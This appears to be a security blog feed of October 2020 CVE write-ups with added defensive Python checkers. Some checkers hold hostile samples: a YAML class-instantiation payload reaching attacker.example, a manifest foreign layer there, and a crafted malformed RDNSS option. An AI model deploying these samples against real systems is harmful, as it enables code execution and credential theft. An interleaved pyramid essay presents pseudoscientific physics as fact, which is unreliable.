If you are incorporating Oracle Business Intelligence results into external portals or applications, stay alert! (Oct 2020)

Preface: Oracle BI Presentation Services is integrated into corporate environments using HTTP and JavaScript. Java made business operations smooth; meanwhile, it also gives people headaches!

Background: When called from within an Oracle BI Presentation Services screen, such as a dashboard or an HTML result view, the URL should begin with the following characters: saw.dll?Go

When called from another screen on the same Web server, the URL should begin with the following characters: /analytics/saw.dll?Go

Vulnerability details: A vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Installation). The ‘getPreviewImage’ function returns a preview image of a previously uploaded theme logo. By manipulating the ‘previewFilePath’ URL parameter, an attacker with access to the administration interface can read arbitrary files on the server: the supplied path is used to open a file without being confined to the logo directory (a path traversal).

Official announcement: https://www.oracle.com/security-alerts/cpuoct2020.html
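The getPreviewImage flaw is a classic path traversal: a file name taken from the request is joined onto a directory without checking where the result lands. The following Python block is an added example, not Oracle's code, that puts the flawed pattern beside a hardened resolver; the directory name LOGO_BASE_DIR and the function names are assumptions for illustration.

```python
import os

# Assumption for this example: the directory where uploaded theme logos live.
# It is not Oracle's real layout, only a stand-in for the base directory.
LOGO_BASE_DIR = "/srv/bi/theme_logos"


def vulnerable_preview_path(base_dir, preview_file_path):
    """The flawed pattern: join the user-supplied path onto the base directory
    and use whatever comes out. normpath() happily collapses '..' segments,
    so '../../../../etc/passwd' walks straight out of base_dir."""
    return os.path.normpath(os.path.join(base_dir, preview_file_path))


def safe_preview_path(base_dir, preview_file_path):
    """Resolve the user-supplied path and refuse anything that escapes base_dir.

    Returns the absolute path on success, or None if the request is rejected.
    """
    if not preview_file_path or "\x00" in preview_file_path:
        return None
    # A logo name is relative by definition; an absolute path is never valid.
    if os.path.isabs(preview_file_path):
        return None
    base = os.path.realpath(base_dir)
    # realpath collapses '.', '..' and symlinks before we compare.
    candidate = os.path.realpath(os.path.join(base, preview_file_path))
    # Compare with a trailing separator so that a sibling directory such as
    # '/srv/bi/theme_logos_old' does not pass as "inside" the base.
    if candidate != base and not candidate.startswith(base + os.sep):
        return None
    return candidate


if __name__ == "__main__":
    samples = [
        "logos/acme.png",              # legitimate request
        "../../../../etc/passwd",      # traversal out of the base directory
        "/etc/passwd",                 # absolute path
        "logos/../../secret.txt",      # traversal hidden behind a valid prefix
    ]
    for p in samples:
        print(f"{p!r:30} vulnerable -> {vulnerable_preview_path(LOGO_BASE_DIR, p)}")
        print(f"{'':30} safe       -> {safe_preview_path(LOGO_BASE_DIR, p)}")
```

The hardened version rejects the request rather than "cleaning" it; silently stripping `..` invites the next bypass (encoded separators, symlinks), whereas resolving to a real path and checking the prefix is robust against all of them.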

CVE-2020-15157 – Vulnerability in containerd (before version 1.2.14)

Preface: Cloud computing is becoming the backbone of modern infrastructure; AI and smart-city technology will be built on the foundation of the cloud.

Technical background: Google Container Registry (GCR) is a service in Google Cloud Platform (GCP) for managing your own Docker container repository. It is a fully managed service in which you can store your custom container images as well as common images from other image repositories.

Vulnerability details: If a container image manifest in the OCI Image format or Docker Image V2 Schema 2 format includes a URL for the location of a specific image layer (a "foreign layer"), the default containerd resolver follows that URL to download it. In v1.2.x, the default resolver also sends its authentication credentials if the server at that URL answers with an HTTP 401 status code plus registry-specific HTTP headers, so whoever controls the foreign layer URL can harvest the credentials the client holds for the pull.

Highlights: The manifest supports an optional field (the `urls` entry of a layer descriptor) giving an external URL from which the layer content may be fetched, and it can point at any registry or domain.

Remedy: This vulnerability has been fixed in containerd 1.2.14. containerd 1.3 and later are not affected.

Workaround: Ensure that images are pulled only from trusted sources. Other container runtimes built on top of containerd but not using the default resolver (such as Docker) are not affected.
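An admission check a practitioner can run before letting a manifest be pulled, as an added example (not containerd's own code): it lists layers carrying a `urls` entry and flags any whose host is not the registry the image was requested from, and it shows the credential policy a hardened resolver applies. The sample manifest, digests and hostnames are constructed for the example.

```python
import json
from urllib.parse import urlsplit

# Constructed sample: an OCI image manifest with one ordinary blob layer and
# one foreign layer whose content lives at an external URL. Digests and
# hostnames are made up for this example.
SAMPLE_MANIFEST = json.loads("""
{
  "schemaVersion": 2,
  "mediaType": "application/vnd.oci.image.manifest.v1+json",
  "config": {
    "mediaType": "application/vnd.oci.image.config.v1+json",
    "digest": "sha256:0000000000000000000000000000000000000000000000000000000000000001",
    "size": 1024
  },
  "layers": [
    {
      "mediaType": "application/vnd.oci.image.layer.v1.tar+gzip",
      "digest": "sha256:0000000000000000000000000000000000000000000000000000000000000002",
      "size": 4096
    },
    {
      "mediaType": "application/vnd.oci.image.layer.nondistributable.v1.tar+gzip",
      "digest": "sha256:0000000000000000000000000000000000000000000000000000000000000003",
      "size": 8192,
      "urls": ["https://layers.attacker.example/blobs/layer3"]
    }
  ]
}
""")


def foreign_layer_urls(manifest):
    """Every (digest, url) pair for layers that carry a 'urls' entry."""
    found = []
    for layer in manifest.get("layers", []):
        for url in layer.get("urls", []):
            found.append((layer.get("digest", ""), url))
    return found


def offregistry_urls(manifest, registry_host):
    """Foreign-layer URLs whose host is not the registry the image came from.

    These are the locations a 1.2.x resolver would follow and, on a 401 with
    registry-style headers, hand its credentials to. Plain http is flagged
    too: credentials must never travel in clear text."""
    bad = []
    for digest, url in foreign_layer_urls(manifest):
        parts = urlsplit(url)
        if parts.scheme != "https" or parts.hostname != registry_host:
            bad.append((digest, url))
    return bad


def should_send_credentials(url, registry_host):
    """Policy of a hardened resolver: present credentials only to the
    registry host itself over https, never to a foreign layer location."""
    parts = urlsplit(url)
    return parts.scheme == "https" and parts.hostname == registry_host


if __name__ == "__main__":
    for digest, url in offregistry_urls(SAMPLE_MANIFEST, "registry.example"):
        print(f"refusing pull: layer {digest[:19]} fetched from off-registry {url}")
```

Run this against manifests from an untrusted source before the runtime sees them; a non-empty result from `offregistry_urls` is a reason to reject the image rather than to "just pull it without credentials", because the layer content itself is then also attacker-controlled.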

VMware Horizon Server and VMware Horizon Client updates address multiple security vulnerabilities (CVE-2020-3997 & CVE-2020-3998) 22-10-2020

Preface: Cross-site scripting (XSS), is a type of attack in which malicious scripts are injected into websites and web applications for the purpose of running on the end user’s device.

Background: VMware Horizon provides virtual desktop and app capabilities to users utilizing VMware’s virtualization technology. A desktop operating system – typically Microsoft Windows – runs within a virtual machine on a hypervisor.

Vulnerability details:

CVE-2020-3998 – If Horizon Client for Windows is installed on the client computer, a malicious attacker with local privileges on that machine may be able to retrieve hashed credentials (information disclosure).

CVE-2020-3997 – A cross-site scripting vulnerability in Horizon Server due to insufficient validation of user input. Successful exploitation may allow an attacker to inject malicious script that is executed in the victim's browser.

For details, refer to the attached diagram. For the official announcement, refer to the link – https://www.vmware.com/security/advisories/VMSA-2020-0024.html

A closer look at CVE-2020-1953 – it impacts Oracle Healthcare Foundation (OHF) Self-Service Analytics (20th Oct 2020)

Preface: As healthcare organizations look to reduce cost, IT rationalization and process transformation are accelerating as providers adopt cloud strategies.

Background: Oracle Healthcare Foundation is a feature-rich analytics platform that supports more than 35 subject areas relevant to health data analytics, giving healthcare providers more granular data regarding the requirements of individuals and populations.

Vulnerability details: YAML is a human-readable data serialization standard that can be used with any programming language and is often used to write configuration files. A flaw was found in Apache Commons Configuration, which uses a third-party library to process YAML files; by default that library instantiates arbitrary classes when the YAML contains explicit type tags (the `!!some.class.Name` form), so a YAML document from an untrusted source can lead to code execution in the application loading it. Oracle Healthcare Foundation Self-Service Analytics is affected by this vulnerability.

Official announcement: https://www.oracle.com/security-alerts/cpuoct2020.html The advisory is long; search for the keyword “CVE-2020-1953” to find the details.
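As an added illustration (not the Apache Commons Configuration fix, which is a Java change), the following Python scanner implements the pre-parse check a practitioner can put in front of any YAML loader that accepts configuration from outside: it rejects documents carrying explicit tags outside the core schema, which is exactly what the `!!` class-instantiation payloads rely on. The allowlist, sample documents and function names are assumptions for the example.

```python
import re

# Tags of the YAML core/JSON schemas plus a few common data-only extras.
# Anything else (especially "!!java...", "!!javax..." or "!!python/...")
# asks the loader to construct a typed object and is refused up front.
SAFE_TAGS = {
    "!!str", "!!int", "!!float", "!!bool", "!!null",
    "!!map", "!!seq", "!!set", "!!omap", "!!pairs",
    "!!binary", "!!timestamp", "!!merge",
}

# A tag token: verbatim "!<...>", shorthand "!!name", or local "!name".
# The lookbehind keeps "a!!b" inside a bare word from counting as a tag.
TAG_RE = re.compile(r"""(?<![\w"'])(!<[^>]*>|!![^\s{}\[\],]*|![^\s{}\[\],]+)""")


def _strip_quoted_and_comments(line):
    """Blank out quoted scalars and trailing comments so a '!!' inside a
    string literal or comment is not mistaken for a tag. (Escaped quotes
    inside double-quoted scalars are not handled; they only cause a false
    positive, never a miss.)"""
    out = []
    quote = None
    for i, ch in enumerate(line):
        if quote:
            if ch == quote:
                quote = None
            out.append(" ")
        elif ch in ("'", '"'):
            quote = ch
            out.append(" ")
        elif ch == "#" and (i == 0 or line[i - 1].isspace()):
            break  # rest of the line is a comment
        else:
            out.append(ch)
    return "".join(out)


def unsafe_tags(yaml_text):
    """Return (line_number, tag) for every tag that is not in SAFE_TAGS.
    An empty list means the document is safe to hand to the parser."""
    hits = []
    for lineno, line in enumerate(yaml_text.splitlines(), start=1):
        for tag in TAG_RE.findall(_strip_quoted_and_comments(line)):
            if tag not in SAFE_TAGS:
                hits.append((lineno, tag))
    return hits


# Constructed samples: a benign configuration, and one carrying the kind of
# explicit class tags a default (unsafe) constructor would instantiate.
BENIGN = """\
database:
  host: db.internal
  port: !!int "5432"
  note: "a literal !!str inside quotes is just text"  # and !!this is a comment
"""
HOSTILE = """\
database:
  host: db.internal
engine: !!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[!!java.net.URL ["http://attacker.example/"]]]
]
"""

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN), ("hostile", HOSTILE)):
        print(name, unsafe_tags(doc) or "no unsafe tags")
```

The scanner is a guard rail, not a substitute for loading with a safe constructor: the real fix is to configure the YAML library so that explicit tags cannot create objects at all, and this check simply makes sure such documents are rejected and logged before they reach any loader.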

Security Focus – ESXi OpenSLP RCE vulnerability (CVE-2020-3992)

Preface: If you like open-source applications, you should also accept the bugs that come with them.

OpenSLP has been ported to a wide variety of systems, for example Linux (32/64), Windows (32/64), SCO Unix, FreeBSD, Solaris, Tru64, Mac OS X, Darwin and others. OpenSLP eliminates the need for users to know the names of network hosts: users need only know a description of the service they want to use, and based on this description OpenSLP returns the URL of the requested service.

Vulnerability details: A malicious actor residing in the management network who has access to port 427 on an ESXi machine may be able to trigger a use-after-free in the OpenSLP service resulting in remote code execution. To exploit the vulnerability, a malicious user must send a malformed SLP packet to the target system.

Remedy: https://www.vmware.com/security/advisories/VMSA-2020-0023.html The advisory lists patched ESXi builds; where patching must wait, VMware's documented workaround (KB 76372) is to stop the SLP service on the host, disable the CIMSLP firewall ruleset and keep the service from starting at boot. In either case, confirm that port 427 is not reachable from anything outside the management network.

Comment: From my observation, a similar OpenSLP vulnerability was found a few years ago. However, there is no official patch for remediation. I strongly believe this bug will be exploited by cyber criminals, so it is highly recommended to disable this function.

Is it a myth or is it true? Quantum entanglement in the pyramid's internal compartment.

Preface: The pyramids of Egypt are a mystery to mankind. What were they used for? According to scientists' evaluations so far, it is hard to believe that ancient mankind had the knowledge and capability to build such a facility.

This article uses currently known materials. Furthermore, it includes my imagination and logic, so you can treat it as fiction or as unknown scientific matters. Finally, I would like to pay tribute to the fathers of my enlightenment (Zecharia Sitchin and Erich von Daniken).

I hereby give my respects to Osiris, Isis and Horus.

Background: Einstein opposed the Danish physicist Bohr's interpretation of quantum mechanics. In March 1935, he and two colleagues published a challenge to it, arguing that Bohr's theory would require the universe to have a "ghostly action at a distance" exceeding the speed of light. This argument became the famous EPR paradox.

Bohr's side was vindicated in 1982, when Alain Aspect's team in France conducted experiments with light from calcium atoms and showed that such a "ghostly action at a distance" does exist. This phenomenon is called "quantum entanglement."

Is it a myth or is it true? Are there advanced civilizations in the cosmos?

People who are interested in the pyramids of Egypt ask what the objective of the pyramid design was. The architecture shows that the whole structure points to different constellations. For example, the star shaft of the King's Chamber inside the pyramid points to Orion's Belt (see the diagram below for reference). Orion contains some of the brightest stars in Earth's sky; its stars lie at distances ranging from 243 to 1360 light years. The belt stars are members of the Orion OB1b association, along with many other stars in this region, and they travel together through space. Are there advanced civilizations in the cosmos? The star shafts of the pyramid point to constellations, but what was the objective? Communication, or something else?

Reference 1: The late Sumerian civilization expert Zecharia Sitchin, in his book "The 12th Planet", analysed Sumerian cuneiform. According to his reading, the Sumerian clay tablets describe the creators of ancient Sumerian culture as the Anunnaki.

The Anunnaki were a race of extraterrestrials from a planet beyond Neptune called Nibiru. However, such a new planet in our solar system has not been confirmed.

Reference 2: NASA, using mathematical calculation, speculates that there is a new planet in space, the so-called Planet X. This does not mean a new planet in our solar system has been found: the existence of this distant world is only theoretical at this point, and no direct observation of the object nicknamed "Planet 9" has been made.

About the star shafts of the pyramid – my observation and analysis

Engineer Christopher Dunn proposes that the Queen's Chamber functioned as a reactor in which hydrochloric acid (HCl) fed through the southern shaft was mixed with hydrated zinc chloride (ZnCl2) fed through the northern shaft to produce hydrogen (H2) gas. Part of my analysis is based on his theory. OK, be my guest and read the details below.

Overview of the architecture

The diagram below shows the ancient Egyptians filling chemicals in on both the left and right sides of the pyramid. In reality, carrying buckets of chemicals would not be enough to support this operation. As we know, the Great Pyramid has a height of 455.2 ft (138.7 m) and the star shafts are located in the middle of the pyramid, so refilling the chemicals would not be easy. There is therefore reason to believe they made use of another method. Please be reminded that this procedure is not covered in this article.

Step 1. To explore the secret function of the King's Chamber, the beginning phase of my imagination follows the theory founded by Christopher Dunn. For more details, refer to the diagram below. The bottom right of the diagram shows a yellow pipe. I think the original design had a component there that was lost. The overall function of this facility was mainly to provide a hydraulic pump. In this article, I do not provide analysis in this area.

Steps 2 & 3: According to steps 2 and 3 shown in the diagram, the chemical reaction generates heat, explosions and hydrogen when the two chemicals meet. In addition, water keeps running into the Subterranean Chamber, so the air pressure inside the Queen's Chamber grows. As a result, the heat, explosions and hydrogen migrate to the Grand Gallery.

Step 4: This step differs from engineer Christopher Dunn's concept. Referring to the diagram below, my view is that the Grand Gallery's major function is similar to a silencer. Apart from that, it has a feature which reduces destructive vibration inside the pyramid. The Grand Gallery's sloped design aims to reduce the chance of damage during a chemical explosion, because the chemicals stay in the Queen's Chamber and the lower part of the Grand Gallery while the hot, high-pressure air rises into the King's Chamber. The King's and Queen's Chambers are constructed of granite, which contains a high density of quartz. The chemical reaction raises the internal air pressure, so a huge volume of pressurised air presses against the granite and triggers the piezoelectric effect.

Step 5: 1935, researchers predicted that under certain high-pressure conditions, hydrogen could take on metallic properties.

The piezoelectric effect occurs through compression of a piezoelectric material, and quartz is one such material. The usual method is to place the quartz between two metal plates. Under the circumstances of the King's Chamber:

High pressure presses against the granite surface. The opposite side of the quartz, embedded in the granite, is equivalent to an electrical ground, because in this theory the granite body is taken to be a good conductor of electricity. Therefore it produces electricity. The conceptual theory is displayed below:

Step 6: Since the whole cavity of the King's Chamber contains hydrogen, the surface of the granite carries a positive electric charge. Since it is a non-equilibrium electron energy distribution environment, it is possible in this way to obtain coherent microwave radiation from the crystals and gases. The microwave beam is emitted through the star shaft. In addition, the star shaft points to the Orion constellation, so we can go to the final step: finding out the function of the pyramid. Before providing the final details of my idea, let me do a quick review of quantum entanglement.

What is quantum entanglement? A large particle quickly decays into two smaller particles that fly away in opposite directions at the speed of light. When one of the particles is disturbed alone, the other particle senses it at the same instant, even though the two particles are moving apart at twice the speed of light. This phenomenon, seemingly several times faster than the speed of light, is called "quantum entanglement."

Only quantum entanglement can open the wormhole.

Time travel to the past is theoretically possible in certain general relativity spacetime geometries that permit traveling faster than the speed of light, such as traversable wormhole.

Quantum is a collective term! Photons, electrons, quarks, and neutrinos can all be said to be quantum. There is no concept of speed in quantum mechanics! Because there is no speed operator, there is no speed eigenstate and speed eigenvalue.

Highlight (QE): Because the electronic transition is actually an entangled system formed by electrons and other particles, changing the energy state of the other particles can change the energy state of the electron. The entangled system's "ghost-like action at a distance" has an infinite speed of action and requires no time.

In the long story described above, we found that the key elements inside the King's Chamber are hydrogen and microwaves. Refer to the following characteristics of these elements:

A Hydrogen atom consists of a proton and an electron which are “bound” together – the proton (positive charge) and electron (negative charge) stay together and continually interact with each other.

Phonons at GHz frequencies can pass through materials that are opaque to photons, the particles that carry light.

Remark: Phonons are particles of sound or heat.

Therefore, we can apply the concept and make the thing happen. Re-using the statement of theory (Highlight QE) above: the electronic transition is actually an entangled system formed by electrons and other particles, and changing the energy state of the other particles can change the energy state of the electron. The entangled system's "ghost-like action at a distance" has an infinite speed of action and requires no time. So the "ghost-like action at a distance" appears. Make the dream come true. Perhaps we can tell Albert Einstein!

So, if the advanced civilization or the people who built the pyramid put a hadron collider there to create a black hole, they could do time travel. My comment is that the stone coffin installed in the King's Chamber is not a coffin. It is the stand of a machine. Perhaps it is a hadron collider.

Reference: Can Large Hadron Collider cause black hole? First of all, yes, it is true that the LHC might create microscopic black holes. … To date, the collider still has not produced any collisions, and it is the extreme energy of those collisions — up to 14 tera-electron volts — that could potentially create a microscopic black hole.

————————–End of Document——————————————

CVE-2020-16952 – SharePoint users, stay alert! (17th Oct 2020)

Preface: Perhaps it is a design limitation. SharePoint did not check the source markup of an application package, which gives an attacker an opportunity. When you read the prerequisites of the proof of concept, you may feel that this vulnerability is hard to exploit. However, a way to trigger it has been found, so we must be aware of it.

Vulnerability details: An authenticated attacker can craft pages to trigger a server-side include that can be leveraged to leak the web[.]config file. The attacker can leverage this to achieve remote code execution.

Prerequisite: the attacker needs the AddAndCustomizePages permission, which is enabled by default.

Hints: The Add and Customize Pages permission is granted at site level; it is not part of a list permission level. Having Full Control at list level does not give you the site-level permission. You can create a new permission level that includes only Add and Customize Pages, create a new SharePoint group with that permission level, and then add yourself to the group to obtain the Add and Customize Pages permission at site level.
If it is at site level, make sure you have enabled Custom Script in the SharePoint admin center: go to SharePoint admin center > Settings > Custom Script.

Remedy: The security update addresses the vulnerability by correcting how SharePoint checks the source markup of application packages – https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952

CVE-2020-13943 – Apache Tomcat HTTP/2 DoS (16th Oct 2020)

Preface: Slow HTTP attacks are denial-of-service (DoS) attacks. They appeared nearly a decade ago, and such vulnerabilities made people aware of application security.

Background: Why do we need HTTP/2?

HTTP/2 allows the client to send multiple requests concurrently over the same TCP connection (multiplexing), and the server can send the responses back over the same connection, thereby reducing additional round trips (RTT).

Vulnerability details: On 26 Jun 2020, a vulnerability was found in Apache Tomcat concerning the handling of system resources when a connection is upgraded to HTTP/2.
The matter is caused by the multi-protocol design: Tomcat did not release the HTTP/1.1 processor's resources after the upgrade, so a sufficient number of such connections let Tomcat consume all available memory and trigger a denial of service.

Remedy (official announcement): Refer to link – http://mail-archives.us.apache.org/mod_mbox/www-announce/202010.mbox/%3C2b767c6e-dcb9-5816-bd69-a3bc0771fef3%40apache.org%3E

Microsoft Addresses Windows TCP/IP RCE/DoS Vulnerability – US Homeland security urge for public attention. (14th Oct 2020)

Preface: Before the release of IP version 6, we had a good impression of its features.

Technical background: The official technical article provides the definition of the IPv6 RDNSS (Recursive DNS Server) option's length field (details refer to the attached diagram – point 3). Per the RFC, the length is counted in 8-octet units including the type and length bytes: 3 for one IPv6 address and 2 more for each additional address, so a compliant length is always odd.

Potential impact: If an even length value is provided, the attacker intentionally causes the Windows TCP/IP stack to increase the size of the network buffer by 8 bytes incorrectly, because the stack internally counts in 16-byte increments and fails to account for a non-RFC-compliant length value. This mismatch results in the stack interpreting the last 8 bytes of the current option as the start of a second option, ultimately leading to a buffer overflow and potential RCE.

Remedy: The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement packets – https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898

Comment: The vulnerability Microsoft hit is caused by an IPv6 design feature. Perhaps it is a fundamental design matter. I predict that other vendors may encounter the same matter soon.
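To make the length rule concrete, here is an added Python example (not Microsoft's code) that walks the Neighbor Discovery options carried after a Router Advertisement header and rejects an RDNSS option whose length is even or below 3; it also builds a well-formed option and a deliberately malformed length-4 one for comparison. The sample addresses and helper names are constructed for the example, and the 16-byte RA header is assumed to have been stripped already.

```python
import ipaddress
import struct

ND_OPT_RDNSS = 25  # Recursive DNS Server option (RFC 8106)


class MalformedOption(ValueError):
    """Raised for any option whose length does not fit the data or the RFC."""


def parse_nd_options(payload):
    """Walk the ND options that follow the 16-byte RA header.

    Each option is Type(1) Length(1) body..., where Length is in 8-octet
    units and includes the type and length bytes. Returns [(type, body)].
    """
    options = []
    off = 0
    while off < len(payload):
        if len(payload) - off < 2:
            raise MalformedOption("truncated option header")
        opt_type, opt_len = payload[off], payload[off + 1]
        if opt_len == 0:
            raise MalformedOption("option length 0")  # RFC 4861: must be non-zero
        total = opt_len * 8
        if off + total > len(payload):
            raise MalformedOption("option runs past end of packet")
        if opt_type == ND_OPT_RDNSS and (opt_len < 3 or opt_len % 2 == 0):
            # RFC 8106: 3 for one address plus 2 per extra address, so the
            # length is always odd. An even value is the malformed case:
            # the option does not divide into whole 16-byte addresses and
            # its last 8 bytes get read as the start of a "second option".
            raise MalformedOption(f"RDNSS length {opt_len} is not odd and >= 3")
        options.append((opt_type, payload[off + 2:off + total]))
        off += total
    return options


def is_wellformed(payload):
    """True if every option parses cleanly, False otherwise."""
    try:
        parse_nd_options(payload)
        return True
    except MalformedOption:
        return False


def rdnss_servers(body):
    """RDNSS body: 2 reserved bytes, 4-byte lifetime, then 16-byte addresses."""
    lifetime = struct.unpack("!I", body[2:6])[0]
    addrs = [ipaddress.IPv6Address(body[i:i + 16]) for i in range(6, len(body), 16)]
    return lifetime, addrs


def build_rdnss(addresses, lifetime=3600, length=None):
    """Build an RDNSS option. 'length' can be overridden to craft a bad one."""
    body = b"\x00\x00" + struct.pack("!I", lifetime)
    for a in addresses:
        body += ipaddress.IPv6Address(a).packed
    if length is None:
        length = 1 + 2 * len(addresses)
    return bytes([ND_OPT_RDNSS, length]) + body


# Constructed samples (option bytes only, RA header already stripped):
# a valid one-server option (length 3, 24 bytes) and one that advertises
# length 4 (32 bytes) with 8 trailing bytes that do not form an address.
GOOD = build_rdnss(["2001:db8::53"])
BAD = build_rdnss(["2001:db8::53"], length=4) + b"\x00" * 8

if __name__ == "__main__":
    print("GOOD well-formed:", is_wellformed(GOOD), rdnss_servers(parse_nd_options(GOOD)[0][1]))
    print("BAD  well-formed:", is_wellformed(BAD))
```

The same rule makes a serviceable IDS signature: an ICMPv6 type 134 packet carrying an option of type 25 whose length byte is even or below 3 should never appear on a healthy network, so alerting on it costs nothing in false positives.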

Homograph Attack (Puny-code) – CVE-2020-25779

Preface: To avoid malware attacks, DNS is the first door for quarantine. This step is not difficult: check whether the domain name being called is included in the blocklist.

What is Punycode?
An ASCII encoding of Unicode domain labels that cannot be written in ASCII; in DNS such a label appears with the prefix "xn--".

Background: There are two different scenarios for a cyber threat actor to exploit.

  1. The attacker builds deceptive IDNs (Internationalized Domain Names) that are likely to mislead internet users.
  2. A phishing attack is almost impossible to detect when a Punycode handling weakness is present.

Synopsis: If the DNS filter mechanism does not convert IDN domains to their Punycode form before verification, a blocklisted domain may be ignored by the filter.

Example: The domain “xn--eqru1b157l[.]co” is equivalent to “黑名單[.]co”. Whereby “xn--eqru1b157l” is the Puny-code.

Vulnerability details: Trend Micro Antivirus for Mac 2020 (Consumer) Bypass Web Threat Protection via Internationalized Domain Name Homograph Attack (Puny-code) Vulnerability.

Remedy: Trend Micro has released a new build of Trend Micro Antivirus for Mac Security (Consumer). Please refer to link – https://helpcenter.trendmicro.com/en-us/article/TMKA-09949
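The synopsis above, as an added Python example (not Trend Micro's code): the blocklist entry is stored in A-label (xn--) form, the naive comparison misses the Unicode spelling, and the hardened check normalises both sides to A-labels before comparing. The blocklist and domain names are constructed for the example.

```python
import unicodedata

# Constructed blocklist, stored the way threat feeds usually ship it: in
# A-label (xn--) form. The Unicode spelling of the first entry is 黑名單.co.
RAW_BLOCKLIST = ["xn--eqru1b157l.co", "evil.example"]


def to_alabel(domain):
    """Canonical comparison form: trailing dot removed, NFC-normalised,
    lower-cased, then IDNA-encoded so every non-ASCII label becomes
    xn--<punycode>. ASCII-only names pass through unchanged."""
    domain = unicodedata.normalize("NFC", domain.strip().rstrip(".")).lower()
    return domain.encode("idna").decode("ascii")


def to_ulabel(domain):
    """Inverse: the Unicode form of an xn-- domain, for human review."""
    return domain.encode("ascii").decode("idna")


def naive_is_blocked(domain, blocklist):
    """The flawed check: exact string match against the list as written.
    A blocked xn-- entry looked up by its Unicode spelling slips through."""
    return domain in blocklist


def is_blocked(domain, blocklist):
    """Hardened check: both sides normalised to A-labels before comparing."""
    canonical = {to_alabel(d) for d in blocklist}
    return to_alabel(domain) in canonical


if __name__ == "__main__":
    for name in ["黑名單.co", "xn--eqru1b157l.co", "XN--EQRU1B157L.CO.", "safe.example"]:
        print(f"{name:22} naive={naive_is_blocked(name, RAW_BLOCKLIST)!s:5} "
              f"hardened={is_blocked(name, RAW_BLOCKLIST)!s:5} ({to_ulabel(to_alabel(name))})")
```

Normalise at ingestion as well as at lookup: a feed that mixes Unicode and xn-- entries is as much of a gap as a resolver that forgets to encode, and case and trailing-dot variants are the cheapest evasions of all.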